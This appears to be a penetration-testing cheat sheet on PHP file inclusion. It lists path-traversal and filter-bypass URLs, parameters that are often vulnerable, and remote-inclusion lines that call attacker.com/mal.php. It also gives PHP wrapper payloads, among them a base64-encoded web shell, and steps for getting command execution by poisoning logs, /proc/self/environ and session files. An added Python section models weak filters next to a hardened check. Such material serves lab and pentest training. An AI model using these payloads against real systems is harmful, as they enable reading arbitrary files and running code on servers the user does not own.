File Inclusion
Remote File Inclusion (RFI): the file is loaded from a remote server (best case: you write the code and the server executes it). In PHP this is disabled by default (allow_url_include=Off).
Local File Inclusion (LFI): the server loads a local file.
The vulnerability occurs when the user can control, in some way, which file the server is going to load.
Vulnerable PHP functions: require, require_once, include, include_once. File-reading functions such as file_get_contents, fopen and readfile with a user-controlled path give arbitrary file read (path traversal) but do not execute the PHP inside the file.
Blind - Interesting - LFI2RCE files
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ
# --hw 0 hides responses with zero words (file missing or unreadable), so only the readable files from the wordlist remain
Good wordlists for fuzzing
Basic LFI and Bypass Techniques
http://example.com/index.php?page=../../../etc/passwd
# null byte (truncates the path; PHP rejects NUL bytes in paths since 5.3.4)
http://example.com/index.php?page=../../../etc/passwd%00
# encoding (double URL encoding and overlong UTF-8 "/" for filters that check the raw value before it is decoded)
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
# filter bypass (for filters that strip "../" once instead of recursively)
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
http://example.com/index.php?page=/var/www/../../etc/passwd #Maintain the initial path (for filters that only check the prefix)
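The bypasses above each defeat a specific weak filter. The Python below is an added example (not code from the original page) that models three such filters next to a hardened check, so you can see why `....//` survives a one-pass `str_replace('../', '')`, why a double-encoded `%252f` passes a blocklist that runs before URL decoding, and why a prefix check falls to `/var/www/../../`. The web root `/var/www/html` and the page name `about.php` are assumptions made for the demo.

```python
import os
import urllib.parse

# Assumed web root for the demo (not a value from the page).
WEBROOT = "/var/www/html"


def naive_strip_once(page: str) -> str:
    """Weak filter 1: remove every '../' in a single, non-recursive pass
    (the str_replace('../', '', $page) pattern). '....//' loses its inner
    '../' and collapses back into '../'."""
    return page.replace("../", "")


def blocklist_then_decode(page: str) -> str:
    """Weak filter 2: reject a raw value containing '../', then URL-decode it
    before the include. The web server already decoded the query once, so a
    double-encoded '%252f' arrives here as '%2f', passes the check, and only
    becomes '/' in the decode that follows."""
    if "../" in page:
        raise ValueError("blocked by filter")
    return urllib.parse.unquote(page)


def keep_prefix(page: str) -> str:
    """Weak filter 3: only require that the value starts with the expected
    directory and then open it as-is. Returns what the OS actually opens."""
    if not page.startswith("/var/www/"):
        raise ValueError("blocked by filter")
    return os.path.normpath(page)


def resolve(filtered: str) -> str:
    """What include(WEBROOT . '/' . $filtered) ends up opening, with '..' and
    duplicate slashes collapsed the way the kernel path walk does it."""
    return os.path.normpath(os.path.join(WEBROOT, filtered))


def is_safe_page(page: str) -> bool:
    """Hardened check: decode once, reject NUL bytes, canonicalise with
    realpath (collapses '..', '//' and symlinks) and require the result to stay
    inside the web root. commonpath is used instead of startswith so that
    '/var/www/html2/x' is not accepted as a child of '/var/www/html'."""
    decoded = urllib.parse.unquote(page)
    if "\x00" in decoded:
        return False
    root = os.path.realpath(WEBROOT)
    full = os.path.realpath(os.path.join(root, decoded))
    return os.path.commonpath([root, full]) == root


if __name__ == "__main__":
    # Constructed payloads, one per filter, plus a legitimate page name.
    print("strip once  :", resolve(naive_strip_once("....//....//....//etc/passwd")))
    print("check/decode:", resolve(blocklist_then_decode("..%2f..%2f..%2fetc%2fpasswd")))
    print("prefix only :", keep_prefix("/var/www/../../etc/passwd"))
    for candidate in ("about.php", "../../../etc/passwd", "..%2f..%2f..%2fetc%2fpasswd%00"):
        print(f"hardened    : {candidate!r:40} -> {is_safe_page(candidate)}")
```

The hardened check still only answers "is this inside the web root"; a real fix maps a short key (`page=about`) to a fixed filename through an allowlist and never passes user input to `include` at all.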
Top 25 parameters
Here is a list of the top 25 parameters that could be vulnerable to local file inclusion (LFI) (from link):
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
Basic RFI
http://example.com/index.php?page=http://attacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php  # UNC path on Windows targets, fetched over SMB as a filesystem path
LFI / RFI using PHP wrappers & protocols
php://filter
# php://filter does not need allow_url_include; convert.base64-encode is the usual way to read PHP source without executing it
# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.strip_tags example (this filter is deprecated since PHP 7.3)
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");
# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://text/plain,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://text/plain,£hellooo=");
## Output: =C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://text/plain,trololohellooo=");
# Compression Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); # To decompress the data locally
data://
# data:// is a URL wrapper, so it needs allow_url_include=On
http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
# the base64 above decodes to: <?php system($_GET['cmd']);echo 'Shell done !'; ?>
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
expect://
# needs the expect PECL extension, which is not installed by default
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
php://input
# Specify your payload in the POST body (needs allow_url_include=On)
http://example.com/index.php?page=php://input
POST DATA: <?php system('id'); ?>
More protocols
LFI2RCE
Log injection
If the application is vulnerable to LFI and you can reach the Apache or Nginx log file, put a PHP shell such as <?php system($_GET['c']); ?> in the User-Agent (or in a GET parameter) and then include the log file. A payload in a GET parameter usually reaches the log URL-encoded because the client encodes it, so the User-Agent header is the reliable place. Keep the payload free of double quotes (Apache backslash-escapes them in log fields) and of syntax errors: a PHP parse error written to access.log breaks every later include of that file, so test the stub once, not repeatedly. We do this in HTB box Vessel.
Default log paths:
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
Via /proc/self/environ
Like a log file: send the payload in the User-Agent and it is reflected inside /proc/self/environ. This only works when the PHP handler exposes the request headers in its own process environment (CGI-style setups); under mod_php or php-fpm the file usually shows only the daemon's startup environment.
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
Via PHP sessions
Check if the website uses PHP sessions (PHPSESSID):
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
Sessions are stored in /var/lib/php5/sess_[PHPSESSID] by default (newer installs use /var/lib/php/sessions/sess_[PHPSESSID] or /tmp/sess_[PHPSESSID]; session.save_path in phpinfo() gives the real location):
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
Set the user cookie to <?php system('cat /etc/passwd');?> so the application writes the payload into the session file,
or send it in the POST data:
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
Then use the LFI to include the PHP session file:
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8n